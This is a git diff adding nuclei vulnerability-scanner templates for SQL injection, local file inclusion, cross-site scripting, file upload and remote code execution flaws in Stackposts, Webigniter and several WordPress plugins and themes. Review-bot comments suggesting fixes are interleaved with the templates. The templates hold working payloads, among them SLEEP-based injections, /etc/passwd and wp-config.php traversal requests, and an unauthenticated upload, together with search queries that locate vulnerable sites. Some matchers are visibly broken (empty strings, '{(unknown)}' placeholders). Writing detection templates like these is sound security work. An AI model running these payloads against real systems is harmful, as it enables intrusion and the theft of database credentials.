@@ -0,0 +1,36 @@ +id: stackposts-sqli + +info: + name: Stackposts Social Marketing Tool v1.0 - SQL Injection + author: r3Y3r53 + severity: high + description: | + SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries. + reference: + - https://www.exploit-db.com/exploits/51473 + - https://vulners.com/zdt/1337DAY-ID-38725 + - https://codecanyon.net/item/stackposts-social-marketing-tool/21747459 + metadata: + verified: true + max-request: 1 + shodan-query: html:"stackposts" + tags: sqli,unauth,stackposts + +http: + - raw: + - | + @timeout: 15s + POST /spre/auth/login HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + username=1')AND (SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg&password=test + + matchers: + - type: dsl + dsl: + - 'duration>=5' + - 'contains(content_type, "text/html")' + - 'contains(body, "account you entered")' + - 'status_code == 200' + condition: and diff --git a/http/vulnerabilities/other/taiwanese-travel-lfi.yaml b/http/vulnerabilities/other/taiwanese-travel-lfi.yaml new file mode 100644 index 0000000000..ea004215e6 --- /dev/null +++ b/http/vulnerabilities/other/taiwanese-travel-lfi.yaml 
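Review bot: The raw request line is `POST /spre/auth/login HTTP/2`; as far as I know nuclei's raw request engine only speaks HTTP/1.1, and every other raw template in this commit uses `HTTP/1.1`, so this should read `POST /spre/auth/login HTTP/1.1`. A second concern is that a single SLEEP(5) probe judged only by `duration>=5` fires on any slow or overloaded target; a control request with `SLEEP(0)` and a matcher of `duration_1>=5 && duration_2<5` separates injection from latency, with `max-request` raised to 2 and the remaining checks indexed to the first response.
```yaml
http:
  - raw:
      - |
        @timeout: 15s
        POST /spre/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username=1')AND (SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg&password=test

      - |
        @timeout: 15s
        POST /spre/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username=1')AND (SELECT 9595 FROM (SELECT(SLEEP(0)))YRMM) AND ('gaNg'='gaNg&password=test

    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=5 && duration_2<5'
          # … unchanged: content_type, body and status checks, now on the _1 response …
        condition: and
```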
@@ -0,0 +1,35 @@ +id: taiwanese-travel-lfi + +info: + name: Taiwanese Travel - Local File Inclusion + author: r3Y3r53 + severity: high + description: | + The vulnerability in '/index.php?page=' allows for Local File Inclusion (LFI), granting attackers the ability to include and potentially execute files on the server, compromising the application's security + reference: + - https://www.exploitalert.com/view-details.html?id=35607 + metadata: + google-query: intext:"COPYRIGHT" inurl:?page=regulation.php + verified: true + max-request: 1 + tags: lfi,unauth,taiwanese + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?page=/etc/passwd" + + matchers: + - type: regex + part: body + regex: + - "root:x:0:0:" + + - type: word + part: body + words: + - "travel" + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/other/talroo-jobs-xss.yaml b/http/vulnerabilities/other/talroo-jobs-xss.yaml new file mode 100644 index 0000000000..9c020487b9 --- /dev/null +++ b/http/vulnerabilities/other/talroo-jobs-xss.yaml 
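Review bot: The `matchers` list has no `matchers-condition: and`, and nuclei's default is `or`, so the `status` 200 matcher alone will fire on every reachable host and the word `travel` on any page that mentions travel, regardless of whether `root:x:0:0:` appears; add `matchers-condition: and` on the line above `matchers:`. With that in place the `root:x:0:0:` regex is the actual evidence of inclusion and the other two merely narrow the fingerprint.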
@@ -0,0 +1,29 @@ +id: talroo-jobs-xss + +info: + name: Talroo Jobs Script 1.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials. + reference: + - https://packetstormsecurity.com/files/173043/Talroo-Jobs-Script-1.0-Cross-Site-Scripting.html + - https://www.exploitalert.com/view-details.html?id=39619 + - https://www.netartmedia.net/talroo-jobs + metadata: + verified: true + max-request: 1 + tags: xss,unauth,talroo + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?page=jobs&category=1&lrw3e%22onmouseover=%22confirm(document.domain)%22style=%22position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b%22k1n44=1" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "Talroo Jobs") && contains(body, "confirm(document.domain)")' + - 'contains(content_type, "text/html")' + condition: and diff --git a/http/vulnerabilities/other/webigniter-xss.yaml b/http/vulnerabilities/other/webigniter-xss.yaml new file mode 100644 index 0000000000..17cf910dbb --- /dev/null +++ b/http/vulnerabilities/other/webigniter-xss.yaml 
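Review bot: The body check `contains(body, "confirm(document.domain)")` also succeeds when the application HTML-encodes the quotes and the injection is neutralised (`&quot;onmouseover=&quot;confirm(document.domain)&quot;` still contains that substring), so the template will report non-exploitable reflections. Matching the attribute break itself, `contains(body, "onmouseover=\"confirm(document.domain)\"")` or the single-quoted DSL equivalent, proves the quote survived unescaped. With `condition: and` already set, the two `&&`-joined terms could also be separate list entries for readability.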
@@ -0,0 +1,39 @@ +id: webigniter-xss + +info: + name: Webigniter 28.7.23 - Cross-Site Scripting + author: theamanrawat + severity: medium + description: | + The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ycsz3">bn76w was submitted in the redirect parameter. This input was echoed unmodified in the application's response. By using this Java Script injection, the attacker can trick a lot of users into visiting his dangerous URL which is reflected on the login form, before they log in, warning them that there is a problem with the login + reference: + - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-XSS-Reflected + - https://webigniter.net + metadata: + verified: true + tags: xss,webigniter + +http: + - method: GET + path: + - '{{BaseURL}}/cms/login?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript>bn76w' + - '{{BaseURL}}/login?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript>bn76w' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "Webigniter" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/wordpress/knr-widget-xss.yaml b/http/vulnerabilities/wordpress/knr-widget-xss.yaml new file mode 100644 index 0000000000..9a6778de1f --- /dev/null +++ b/http/vulnerabilities/wordpress/knr-widget-xss.yaml 
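Review bot: The `metadata` block lacks `max-request`, and since two paths are listed the value should be `max-request: 2`, matching how the other templates in this commit declare their request budget. The first word matcher is an empty string `""`, which every body contains, so as written only `Webigniter`, `text/html` and a 200 status are actually checked and any Webigniter login page will be reported; if the reflected payload was lost in transit rather than omitted, restore it as `- "<script>alert(document.domain)</script>"`. The description also refers to a `redirect` parameter and a `ycsz3">bn76w` probe that differ from what the path sends — presumably carried over from the advisory — and "Java Script" should read "JavaScript".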
@@ -0,0 +1,41 @@ +id: knr-widget-xss + +info: + name: KNR Author List Widget - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + KNR Author List Widget suffers from Cross-site Scripting (XSS) in the listItem[] parameter. + reference: + - https://wordpress.org/plugins/knr-author-list-widget/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + metadata: + max-request: 1 + verified: true + tags: xss,knr-author-list-widget,wordpress,wp,wp-plugin + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/knr-author-list-widget/knrAuthorListCustomSortSave.php?listItem[]=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'item: ' + - 'Saved on' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml b/http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml new file mode 100644 index 0000000000..58150eb07e --- /dev/null +++ b/http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml 
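Review bot: The request path ends in `listItem[]=` with no value, so no XSS probe is sent and the `item: `/`Saved on` words only confirm that `knrAuthorListCustomSortSave.php` answers; if the payload was dropped in transit rather than omitted, restore it, e.g. `listItem[]=<script>alert(document.domain)</script>`, and match that same string in the body so a hit proves unencoded reflection. The `Saved on` response text suggests the endpoint persists whatever it is given; if it does, the scan itself writes to the target's option store and the template should carry the `intrusive` tag. The only reference is the plugin listing; an advisory link, or a note that this is an original finding, would help triage.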
@@ -0,0 +1,33 @@ +id: photoblocks-grid-gallery-xss + +info: + name: Gallery Photoblocks < 1.1.41 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Reflected Cross-Site Scripting (XSS) is a type of web vulnerability where an attacker injects malicious scripts into a website, and the injected code gets reflected back to the user's browser, executing the script in the context of the vulnerable website. + remediation: Fixed in version 1.1.41 + reference: + - https://plugins.trac.wordpress.org/changeset/2117972 + - https://wpscan.com/vulnerability/5c57e78a-97b9-4e23-8935-e4c9d806c89d + - https://wordpress.org/plugins/photoblocks-grid-gallery/ + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/" + tags: wordpress,wpscan,photoblocks,wp-plugin,wp,xss + +http: + - raw: + - | + GET /wp-content/plugins/photoblocks-grid-gallery/admin/partials/photoblocks-edit.php?id=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "")' + - 'contains(body, "PhotoBlocks")' + condition: and diff --git a/http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml b/http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml new file mode 100644 index 0000000000..04415e2018 --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml 
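Review bot: `contains(body, "")` is always true, so the template effectively reports any 200 text/html page that mentions "PhotoBlocks", including patched 1.1.41 installs; if the reflected probe was lost in transit rather than omitted, restore it as `contains(body, "<svg/onload=alert(document.domain)>")` so a match demonstrates the unencoded reflection. The raw block is a plain GET with no custom headers and could be written as a `method: GET` / `path:` entry like the other reflected-XSS templates here, which also lets `{{BaseURL}}` handle non-root installs.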
@@ -0,0 +1,30 @@ +id: wp-adivaha-sqli + +info: + name: WordPress adivaha Travel Plugin 2.3 - SQL Injection + author: theamanrawat + severity: high + description: | + An unauthenticated Time-Based SQL injection found in adivaha Travel Plugin 2.3 allows a remote attacker to retrieve the contents of an entire database. + reference: + - https://wordpress.org/plugins/adiaha-hotel/ + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/adiaha-hotel/" + tags: sqli,adivaha,wordpress,wp,wp-plugin + +http: + - raw: + - | + @timeout: 25s + GET /mobile-app/v3/?pid='+AND+(SELECT+6398+FROM+(SELECT(SLEEP(7)))zoQK)+AND+'Zbtn'='Zbtn&isMobile=chatbot HTTP/2 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - duration>=7 + - status_code == 200 + - contains(body, "adivaha") + condition: and diff --git a/http/vulnerabilities/wordpress/wp-adivaha-xss.yaml b/http/vulnerabilities/wordpress/wp-adivaha-xss.yaml new file mode 100644 index 0000000000..dff4a4e906 --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-adivaha-xss.yaml @@ -0,0 +1,26 @@ +id: wp-adivaha-xss + +info: + name: WordPress Adivaha Travel Plugin 2.3 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials + reference: + - https://www.exploit-db.com/exploits/51663 + metadata: + verified: true + tags: wordpress,wp,wp-plugin,xss,adivaha,travel + +http: + - method: GET + path: + - "{{BaseURL}}/mobile-app/v3/?pid=77A89299&isMobile=%20clq95%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Elb1ra" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "", "travelpayout_flight")' + condition: and 
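Review bot: The raw request line `GET /mobile-app/v3/?... HTTP/2` should be `HTTP/1.1`; as far as I know nuclei's raw request engine only supports HTTP/1.1 and the repository's other raw templates use it. A single SLEEP(7) probe judged by `duration>=7` alone will fire on slow targets; a control request with `SLEEP(0)` and `duration_1>=7 && duration_2<7` would distinguish injection from latency. The reference and publicwww slug `adiaha-hotel` differ from the `adivaha` spelling used everywhere else — if that is the real plugin slug it is worth a comment, otherwise it is a typo that breaks the reference link.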
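Review bot: `contains_all(body, "", "travelpayout_flight")` includes an empty string, which every body satisfies, so the check reduces to "200 text/html page containing `travelpayout_flight`" and patched sites will be reported; if the probe was lost in transit, restore it as `contains_all(body, "<script>alert(document.domain)</script>", "travelpayout_flight")`. The `metadata` block is also missing `max-request: 1`, which the SQLi sibling for the same plugin declares.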
diff --git a/http/vulnerabilities/wordpress/wp-ellipsis-xss.yaml b/http/vulnerabilities/wordpress/wp-ellipsis-xss.yaml new file mode 100644 index 0000000000..3267fc0c95 --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-ellipsis-xss.yaml @@ -0,0 +1,31 @@ +id: wp-ellipsis-xss + +info: + name: Ellipsis Human Presence Technology <= 2.0.8 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + The 'page' GET parameter of the inc/protected-forms-table.php file was affected by a reflected XSS vulnerability. + reference: + - https://wpscan.com/vulnerability/c0a138d8-93ac-463c-b650-d849352c0b44 + - https://packetstormsecurity.com/files/154393/ + - https://wordpress.org/plugins/ellipsis-human-presence-technology/ + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/ellipsis-human-presence-technology/" + tags: wordpress,wpscan,wp-plugin,ellipsis-human-presence-technology,xss + +http: + - raw: + - | + GET /wp-content/plugins/ellipsis-human-presence-technology/inc/protected-forms-table.php?&page=%22%20%3E%3Cscript%3Ealert(document.location)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "") && contains(body, "protected-forms-table")' + condition: and diff --git a/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml b/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml new file mode 100644 index 0000000000..7a3f610b80 --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml 
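Review bot: `contains(body, "")` is vacuously true, so the only effective evidence is `protected-forms-table` in a 200 text/html body, which a patched 2.0.9 install would also produce; if the reflected probe was dropped in transit, restore it as `contains(body, "<script>alert(document.location)</script>")`. The leading ampersand in `?&page=` is harmless but unusual — `?page=` is presumably what the advisory describes — and using `document.domain` in the probe would keep it consistent with the rest of the batch.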
@@ -0,0 +1,48 @@ +id: wp-gallery-file-upload + +info: + name: WordPress Plugin Gallery 3.06 - Arbitrary File Upload + author: r3Y3r53 + severity: high + description: | + The Gallery by BestWebSoft WordPress plugin was affected by an Unauthenticated File Upload PHP Code Execution security vulnerability. + remediation: Fixed in version 3.1.1 + reference: + - https://www.exploit-db.com/exploits/18998 + - http://wordpress.org/extend/plugins/gallery-plugin/ + - http://downloads.wordpress.org/plugin/gallery-plugin.3.06.zip + - https://wpscan.com/vulnerability/049c8518-1f52-4aa4-b0b3-218289727353 + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/gallery-plugin/" + google-query: inurl:/wp-content/plugins/gallery-plugin/ + tags: wp,wp-plugin,wordpress,wpscan,file-upload,intrusive + +variables: + filename: "{{to_lower(rand_text_alpha(5))}}" + +http: + - raw: + - | + POST /wp-content/plugins/gallery-plugin/upload/php.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=WebKitFormBoundary20kgW2hEKYaeF5iP + + --WebKitFormBoundary20kgW2hEKYaeF5iP + Content-Disposition: form-data; name="qqfile"; filename="{(unknown)}.png" + + {{randstr}} + + --WebKitFormBoundary20kgW2hEKYaeF5iP-- + + - | + GET /wp-content/plugins/gallery-plugin/upload/files/{(unknown)}.png HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(content_type_1, "text/html") && contains(content_type_2, "image/png")' + - 'contains(body_1, "success:true") && contains(body_2, "{{randstr}}")' + condition: and diff --git a/http/vulnerabilities/wordpress/wp-googlemp3-lfi.yaml b/http/vulnerabilities/wordpress/wp-googlemp3-lfi.yaml new file mode 100644 index 0000000000..ad4dcc6666 --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-googlemp3-lfi.yaml 
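Review bot: Both `filename="{(unknown)}.png"` and the follow-up `GET .../files/{(unknown)}.png` reference `{(unknown)}`, which is not nuclei variable syntax; the `variables:` block defines `filename`, so both should read `{{filename}}.png` — as written the literal string is sent and the second request may fetch a name the server never stored. The second matcher relies on `{{randstr}}` expanding to the same value in the upload body and in the comparison, which I believe nuclei guarantees per template run but is worth a one-line comment. The template uploads a file and never removes it; `intrusive` is correctly set, and a sentence in `description` saying the PNG is left under `upload/files/` would help operators clean up.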
@@ -0,0 +1,41 @@ +id: wp-googlemp3-lfi + +info: + name: WordPress Plugin CodeArt Google MP3 Player - File Disclosure Download + author: theamanrawat + severity: critical + description: | + WordPress Plugin CodeArt Google MP3 Player allows an unauthenticated attacker to download file from server. + reference: + - https://www.exploit-db.com/exploits/35460 + - https://wordpress.org/plugins/google-mp3-audio-player/ + metadata: + verified: "true" + max-request: 1 + publicwww-query: "/wp-content/plugins/google-mp3-audio-player/" + tags: wp-plugin,wp,wordpress,lfi,google-mp3-audio-player,unauth,disclosure + +http: + - raw: + - | + GET /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../wp-config.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_USER" + - "DB_PASSWORD" + - "DB_HOST" + condition: and + + - type: word + part: header + words: + - "application/octet-stream" + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/wordpress/wp-mega-theme.yaml b/http/vulnerabilities/wordpress/wp-mega-theme.yaml new file mode 100644 index 0000000000..e6e52f60ee --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-mega-theme.yaml 
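Review bot: `verified: "true"` is the only quoted boolean in this batch — nuclei treats metadata as free-form so it parses, but the linter and every sibling use bare `true`; change it to `verified: true`. The traversal `../../wp-config.php` lands on `wp-content/wp-config.php` if the script resolves paths relative to its own directory; the exploit-db reference presumably uses this exact depth, but installs that keep `wp-config.php` one directory above the docroot will be missed, so a second path with `../../../wp-config.php` (and `max-request: 2`) would widen coverage. Because a hit returns live database credentials, a note in `description` that the response body must be handled as secret material is warranted.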
@@ -0,0 +1,29 @@ +id: wp-mega-theme + +info: + name: Mega Wordpress Theme - Cross site scripting + author: r3Y3r53 + severity: medium + description: | + WordPress theme with a 'Mega-Theme' design is vulnerable to a reflected XSS attack through the '?s=' parameter. + reference: + - https://cxsecurity.com/issue/WLB-2021120027 + - https://www.zhaket.com/web/megawp-wordpress-theme + metadata: + google-query: Megawp-Theme + verified: true + max-request: 1 + tags: wp,wp-theme,wordpress,xss,mega + +http: + - method: GET + path: + - "{{BaseURL}}/?s=%22%3E%3Cscript%3Ealert(`document.domain`)%3C/script%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "script>alert(`document.domain`)</script") && contains(body, "mega-theme")' + condition: and diff --git a/http/vulnerabilities/wordpress/wp-portrait-archiv-xss.yaml b/http/vulnerabilities/wordpress/wp-portrait-archiv-xss.yaml new file mode 100644 index 0000000000..1b532ffec5 --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-portrait-archiv-xss.yaml 
@@ -0,0 +1,31 @@ +id: wp-portrait-archiv-xss + +info: + name: WordPress Portrait-Archiv.com Photostore 5.0.4 - Reflected Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + The 'pDetails' GET parameter from the js/imageDetails.php was vulnerable to an unauthenticated reflected XSS attack. + reference: + - https://wpscan.com/vulnerability/c6a8757e-41ef-4c20-8c7d-97b57d56fe0e + - https://wordpress.org/plugins/portrait-archiv-shop/ + - https://packetstormsecurity.com/files/154343/ + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/portrait-archiv-shop/" + tags: wordpress,wpscan,wp-plugin,wp,portrait-archiv-shop,xss + +http: + - raw: + - | + GET /wp-content/plugins/portrait-archiv-shop/js/imageDetails.php?pDetails=);});%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "") && contains(body, "showImageDetail")' + condition: and diff --git a/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml b/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml new file mode 100644 index 0000000000..163a61096c --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml 
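Review bot: `contains(body, "")` always holds, so a 200 text/html response containing `showImageDetail` is enough to report the host, which any install of the plugin — patched or not — will produce; if the closing-script probe was lost in transit, restore it as `contains(body, "</script><script>alert(document.location)</script>")` so the match proves the script context was broken out of. Using `document.domain` rather than `document.location` in the probe would also keep it consistent with the rest of the batch.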
@@ -0,0 +1,31 @@ +id: wp-qwiz-online-xss + +info: + name: Qwiz Online Quizzes And Flashcards <= 3.36 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The qname, i_qwiz, session_id and username parameters passed to the registration_complete.php file are affected by XSS issues. + remediation: Fixed in version 3.37 + reference: + - https://wpscan.com/vulnerability/d3c10f69-87b6-43fd-bcbc-c2d35b683ff4 + - https://packetstormsecurity.com/files/154403/ + - https://wordpress.org/plugins/qwiz-online-quizzes-and-flashcards/ + metadata: + publicwww-query: "/wp-content/plugins/qwiz-online-quizzes-and-flashcards/" + verified: true + max-request: 1 + tags: wordpress,wp-plugin,wp,wpscan,packetstorm,qwiz-online-quizzes-and-flashcards + +http: + - raw: + - | + GET /wp-content/plugins/qwiz-online-quizzes-and-flashcards/registration_complete.php?&qname=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "quizzes/flashcard") && contains(body, "")' + condition: and diff --git a/http/vulnerabilities/wordpress/wp-reality-estate-theme.yaml b/http/vulnerabilities/wordpress/wp-reality-estate-theme.yaml new file mode 100644 index 0000000000..e99ff37fbc --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-reality-estate-theme.yaml 
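Review bot: The `tags` line omits `xss` even though the template is a reflected-XSS check, so `-tags xss` runs will skip it; add `xss` to the list. As written `contains(body, "")` is always true, leaving only `quizzes/flashcard` and a 200 status as evidence, so patched 3.37 installs will be reported; if the probe was dropped in transit, restore `contains(body, "</script><script>alert(document.domain)</script>")`. A `contains(content_type, "text/html")` term would also bring it in line with the other XSS templates here.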
@@ -0,0 +1,34 @@ +id: wp-reality-estate-theme + +info: + name: Reality Estate Multipurpose WP-Theme < 2.5.3 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Reflected XSS was discovered in the 'Reality | Estate Multipurpose WordPress Theme'. + remediation: update to v.2.5.3 + reference: + - https://wpscan.com/vulnerability/10064 + - https://www.exploitalert.com/view-details.html?id=34777 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + metadata: + verified: true + publicwww-query: "/wp-content/themes/reality/" + google-query: inurl:"/wp-content/themes/reality/" + tags: xss,wordpress,wp,wp-theme,reality,estate + +http: + - method: GET + path: + - "{{BaseURL}}/properties-with-map/?status&keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(document.domain);//%22" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "reality", "estate", ">=7' + - 'status_code_2 == 500' + - 'contains(body_1, "Smart Manager for e-Commerce")' + - 'contains(body_2, "rel=\"preconnect") || contains(body, "Error")' + condition: and diff --git a/http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml b/http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml new file mode 100644 index 0000000000..94d3049c1f --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml 
@@ -0,0 +1,42 @@ +id: wp-social-warfare-rce + +info: + name: Social Warfare <= 3.5.2 - Remote Code Execution + author: theamanrawat + severity: critical + description: | + Unauthenticated remote code execution has been discovered in functionality that handles settings import. + remediation: Fixed in version 3.5.3 + reference: + - https://wpscan.com/vulnerability/9259 + - https://wordpress.org/plugins/social-warfare/ + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/social-warfare/" + tags: wordpress,wpscan,wp-plugin,wp,social-warfare,rce + +http: + - raw: + - | + GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url={{path}} HTTP/1.1 + Host: {{Hostname}} + + payloads: + path: helpers/payloads/wp-social-warfare-rce.txt + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + + - type: word + part: body + words: + - 'No changes made' + + - type: status + status: + - 500 diff --git a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml new file mode 100644 index 0000000000..ae9f45c410 --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml 
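Review bot: `swp_url={{path}}` splices each payload line into the query string unencoded, so any `&`, `#` or space in a payload line truncates or alters the request; `swp_url={{url_encode(path)}}` keeps the line intact. The matcher expects `/etc/passwd` contents, i.e. a successful OS command execution on the target, which is as invasive as the gallery upload template in this commit, yet this one carries no `intrusive` tag — add it so `-exclude-tags intrusive` behaves consistently. The advisory, as I understand it, has the plugin fetch `swp_url` and evaluate what it finds, so each payload line presumably must be a URL the target can reach that serves the `<pre class="swp_debug">` wrapper; stating that requirement in `description` or the helper file would save users from running the template with a non-URL payload.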
@@ -0,0 +1,32 @@ +id: wp-statistics-sqli + +info: + name: WordPress WP Statistics Plugin 13.0.7 - SQL Injection + author: r3Y3r53 + severity: high + description: | + WordPress Plugin WP Statistics 13.0.7 contains an unauthenticated Time based SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + reference: + - https://www.exploit-db.com/exploits/49894 + - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wp-statistics-sql-injection-13-0-7/ + - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/ + - https://wordpress.org/plugins/wp-statistics/ + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/wp-statistics/" + tags: sqli,unauth,exploitdb,wp-statistics,wp-plugin,wordpress,wp + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin.php?page=wps_pages_page&type=1&ID=1+AND+(SELECT+*+from+(select+SLEEP(6))a)" + - "{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt" + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'contains(content_type, "text/html") && contains(body_2, "WP Statistics")' + - 'status_code == 500' + condition: and diff --git a/http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml b/http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml new file mode 100644 index 0000000000..683281524a --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml 
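Review bot: The DSL mixes unsuffixed variables with `body_2`: as far as I can tell, once `_N` variables appear nuclei evaluates the matcher over both responses and the unsuffixed `duration`, `content_type` and `status_code` then refer to the last response — the `readme.txt` request — which will never be a 500 or take six seconds, so the template cannot match. Index the SLEEP request explicitly: `duration_1>=6`, `contains(content_type_1, "text/html") && contains(body_2, "WP Statistics")`, `status_code_1 == 500`. A `SLEEP(0)` control request would additionally protect against slow targets, and `max-request` should be `2` since two paths are sent.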
@@ -0,0 +1,30 @@ +id: wp-superstorefinder-misconfig + +info: + name: Superstorefinder WP-plugin - Security Misconfigurations + author: r3Y3r53 + severity: medium + description: | + Security misconfiguration is a common security issue that occurs when a system, application, or network is not properly configured to protect against threats and vulnerabilities. + reference: + - https://cxsecurity.com/issue/WLB-2021010145 + - https://www.exploitalert.com/view-details.html?id=36983 + metadata: + google-query: inurl:"wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/exportAjax.php" + publicwww-query: "/wp-content/plugins/superstorefinder-wp/" + verified: true + tags: wordpress,wp-plugin,superstorefinder-wp,wp,misconfig + +http: + - raw: + - | + GET /wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/exportAjax.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "Name") && contains(body, "CategoriesTags") && contains(body, "email")' + - 'contains(content_type, "text/html")' + condition: and diff --git a/http/vulnerabilities/wordpress/wp-upward-theme-redirect.yaml b/http/vulnerabilities/wordpress/wp-upward-theme-redirect.yaml new file mode 100644 index 0000000000..2d982ceb1b --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-upward-theme-redirect.yaml 
